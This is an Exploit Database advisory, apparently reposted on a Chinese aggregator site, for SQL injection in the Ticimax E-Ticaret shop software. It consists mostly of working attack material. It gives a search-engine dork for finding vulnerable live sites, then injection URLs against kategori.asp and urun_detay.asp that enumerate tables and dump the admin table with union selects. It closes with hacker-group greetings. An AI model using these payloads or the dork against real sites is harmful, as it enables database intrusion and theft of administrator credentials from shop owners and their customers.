Ticimax E-Ticaret – SQL Injection

• Exploit Database
• 7 阅读

• 作者： Neuromancer
  日期： 2010-06-01
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/12841/

• # Exploit Title: [Ticimax E-Ticaret ( SQL Injection ) ]
  # Date: [01.06.2010]
  # Author: [Neuromancer]
  # Version: [app version]
  # CVE : [if exists]
  # Code : [exploit code] 
  
  
  #####################
  # Author: [Neuromancer]
  # contact : msn[at]neurom4ncer[dot]com
  # From : TURKEY
  #####################
  
  
  Ticimax e-ticaret ( Kategori.asp, urun_detay.aspLocal SQL Injection Vulnerability
  
  Dork : "Bu Site Ticimax E-Ticaret yazılımı ile hazırlanmıştır"
  
  
  ======================================================================
  
   --=[ Vuln C0de ]=-
   
   [-] localhost/kategori.asp?id='
   [-] localhost/urun_detay.asp?id='
  
  http://[Site].com/kategori.asp?id=1 order by 1
  http://[Site].com/kategori.asp?id=1 union select x,x,group_concat(table_name)+from+information.schema.tables
  
  or
  
  http://[Site].com/kategori.asp?id=1 union select * from admin
  
  =========================| -=[ Attackerz Crew co. ]=- |=========================
  
  Gr33t'z; h4cker.tr, by_fatih, by.kiki, TheNesa, RedMasTeR